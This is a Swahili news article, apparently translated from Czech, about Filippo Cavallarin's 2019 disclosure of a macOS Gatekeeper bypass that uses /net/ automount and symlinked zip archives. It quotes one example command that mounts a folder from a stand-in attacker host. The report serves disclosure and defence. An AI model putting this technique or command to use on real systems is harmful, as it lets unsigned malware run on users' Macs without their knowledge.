Ni rahisi kusakinisha programu hasidi kwenye Mac. Apple haijarekebisha kosa hata baada ya miezi mitatu

27. 5. 2019

Mtafiti wa usalama Filippo Cavallarin alichapisha onyo kuhusu mdudu kwenye macOS 10.14.5 kwenye blogi yake. Hii inajumuisha uwezekano wa kupita kabisa hatua za usalama za Gatekeeper. Kulingana na Cavallarin, alielezea kosa kwa Apple tayari mnamo Februari mwaka huu, lakini kampuni haikurekebisha katika sasisho la hivi karibuni.

Gatekeeper ilitengenezwa na Apple na kuingizwa kwenye mfumo wake wa uendeshaji wa eneo-kazi kwa mara ya kwanza mwaka wa 2012. Ni utaratibu unaozuia programu kufanya kazi bila ujuzi na idhini ya mtumiaji. Baada ya kupakua programu, Mlinda lango hukagua kiotomati msimbo wake ili kuona ikiwa programu imetiwa saini ipasavyo na Apple.

Katika chapisho lake la blogi, Cavallarin anabainisha kuwa Mlinda lango, kwa chaguo-msingi, anazingatia hifadhi ya nje na hisa za mtandao kuwa maeneo salama. Programu yoyote ambayo inakaa katika malengo haya kwa hivyo inaweza kuzinduliwa kiotomatiki bila kulazimika kupitia ukaguzi wa Mlinda Lango. Ni kipengele hiki ambacho kinaweza kutumiwa kuzindua programu hasidi bila ufahamu wa mtumiaji.

Kipengele kimoja kinachoruhusu ufikiaji usioidhinishwa ni kipengele cha kujiendesha kiotomatiki, ambacho huruhusu watumiaji kuweka kiotomatiki ushiriki wa mtandao kwa kubainisha njia inayoanza na "/net/". Kama mfano, Cavallarin anataja njia "ls /net/evil-attacker.com/sharedfolder/" ambayo inaweza kusababisha mfumo wa uendeshaji kupakia yaliyomo kwenye folda ya "shiriki" katika eneo la mbali ambalo linaweza kuwa hasidi.

Unaweza kutazama jinsi tishio linavyofanya kazi kwenye video:

Jambo lingine ni ukweli kwamba ikiwa kumbukumbu ya zip iliyo na ulinganifu mahususi inayoongoza kwa chaguo za kukokotoa otomatiki itashirikiwa, haitaangaliwa na Mlinda lango. Kwa njia hii, mwathirika anaweza kupakua kumbukumbu hasidi na kuifungua kwa urahisi, ikiruhusu mvamizi kuendesha karibu programu yoyote kwenye Mac bila mtumiaji kujua. Kipataji, ambacho huficha viendelezi fulani kwa chaguo-msingi, pia kina sehemu yake ya athari hii.

Cavallarin anasema kwenye blogi yake kwamba Apple iliangazia uwezekano wa kuathirika kwa mfumo wa uendeshaji wa macOS mnamo Februari 22 mwaka huu. Lakini katikati ya Mei, Apple iliacha kuwasiliana na Cavallarin, hivyo Cavallarin aliamua kuweka jambo zima kwa umma.

Zdroj: FCVL

Mada: hifadhi, moja kwa moja, MacOS, video, Mipangilio, funkce, mtumiaji, Maombi, Apple

Majadiliano ya makala

Jina lako

Maoni yako

Kwa kujaza data iliyo hapo juu, ninakubali kwamba kampuni ya TEXT FACTORY s.r.o., ofisi iliyosajiliwa huko Brno, Durďákova 336/29, Černá Pole, Msimbo wa posta: 613 00, nambari ya kitambulisho: 06157831, iliyosajiliwa katika Mahakama ya Mkoa huko Brno, sehemu ya C. , weka 100399, itachakata data yangu ya kibinafsi iliyotolewa katika fomu ya usajili iliyojazwa nami kwa misingi ya maslahi halali ya TEXT FACTORY s.r.o. kulingana na Kifungu cha 6 aya ya 1 barua f) GDPR na kutimiza wajibu wa kisheria (Kifungu cha 6, aya ya 1, herufi c) GDPR), kwa madhumuni yafuatayo: umuhimu wa kuhakikisha kuwa wageni wanaotembelea tovuti zinazoendeshwa na TEXT FACTORY s.r.o. wameidhinishwa kuchangia kikamilifu makala zilizochapishwa au ndani ya majadiliano. vikao na kutumia haki za TEXT FACTORY s.r.o. kama msimamizi wa mabaraza haya ya majadiliano. Habari zaidi juu ya usindikaji wa data ya kibinafsi na haki zinaweza kupatikana katika Masomo juu ya ulinzi wa data ya kibinafsi. maandishi yote

Inaweza kuwa kukuvutia

Kuhusiana